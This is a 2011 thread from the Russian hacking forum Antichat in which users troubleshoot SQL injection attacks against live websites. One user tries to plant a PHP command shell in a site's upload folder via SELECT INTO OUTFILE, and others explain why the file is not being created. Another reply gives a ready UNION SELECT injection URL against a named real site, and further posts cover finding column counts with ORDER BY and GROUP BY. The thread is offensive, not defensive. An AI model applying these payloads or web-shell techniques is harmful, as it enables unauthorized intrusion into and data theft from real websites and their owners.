ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
31.10.2011, 22:28
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от wkar
wkar said:
В чем ошибка ?
Код:
Code:
select '' from mysql.user into outfile '/var/www/uprgroup/data/www/upr-group.ru/images/uploads2/test.php'
через запрос в скуле? или через пыху заливаешь? файл_прив есть положительное? папка доступна для записи?
|
|
|
31.10.2011, 22:33
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
В админке есть SQL-менеджер, папка есть, файл прив тоже.
|
|
|
|
31.10.2011, 22:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Может в том, что пыху не понятно, что такое cmd?
$_REQUEST[cmd] - обращение к массиву по глобальной переменной или хз ещё чему, которой не существует. Кавычки в общем надо.
from mysql.user - нужно убрать вообще
|
|
|
|
31.10.2011, 22:43
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Код:
Code:
Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0, 100' at line 1
Query: select 'test' from mysql.user into outfile '/var/data/www/site/images/test.php' LIMIT 0, 100
|
|
|
|
31.10.2011, 23:43
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
http://www.pmrs.ps/last/etemplate.php?id=249%20and%201=1
как такое крутить?
|
|
|
|
31.10.2011, 23:54
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от vaddd
vaddd said:
http://www.pmrs.ps/last/etemplate.php?id=249%20and%201=1
как такое крутить?
http://www.pmrs.ps/last/etemplate.php?id=-249+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21--%20+
вот так вот и надо...как обычную
|
|
|
|
01.11.2011, 00:14
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
Сообщение от Gorev
Gorev said:
http://www.pmrs.ps/last/etemplate.php?id=-249+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21--%20+
вот так вот и надо...как обычную
ясно...
смутило это:
Сообщение от None
http://www.pmrs.ps/last/etemplate.php?id=249%20order%20by%20100500
|
|
|
|
01.11.2011, 00:35
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756
Репутация:
0
|
|
Сообщение от Melfis
Melfis said:
Может в том, что пыху не понятно, что такое cmd?
$_REQUEST[cmd] - обращение к массиву по глобальной переменной или хз ещё чему, которой не существует. Кавычки в общем надо.
Глупости, отработает и так
Сообщение от Melfis
Melfis said:
from mysql.user - нужно убрать вообще
Не всегда, только если mysql не старый.
wkar у тебя файл не создаётся, варианта три:
1 Нет прав на запись
2 Нет прав на операции с файлами (файлприва тоесть)
3 Путь не верный
--------
upd
Этого не заметил
Сообщение от wkar
wkar said:
Код:
Code:
Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0, 100' at line 1
Query: select 'test' from mysql.user into outfile '/var/data/www/site/images/test.php' LIMIT 0, 100
А откуда лимит-то? Менеджер добавляет наверное? Так срежь его )
|
|
|
|
01.11.2011, 00:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
10263
Репутация:
0
|
|
Разьясните пожалуста что здесь не так?
Код:
Code:
-ttp://www.site.xx/mesto.php?id=1+GROUP+BY+92+--+
все ок 92
далее ставлю
-ttp://www.site.xx/mesto.php?id=1851+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92+--+
ответ
The used SELECT statements have a different number of columns
и ошибка... union+select получается не работает? |
|
|
|
01.11.2011, 08:16
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791
Репутация:
265
|
|
Сообщение от namez2
namez2 said:
Разьясните пожалуста что здесь не так?
Код:
Code:
-ttp://www.site.xx/mesto.php?id=1+GROUP+BY+92+--+
все ок 92
далее ставлю
-ttp://www.site.xx/mesto.php?id=1851+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92+--+
ответ
The used SELECT statements have a different number of columns
и ошибка... union+select получается не работает? ты когда +GROUP+BY+92+--+ ставишь, что тебя что открывается?
если сам сайт, то пропробуй +GROUP+BY+95+--+
там полей может быть больше 92
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
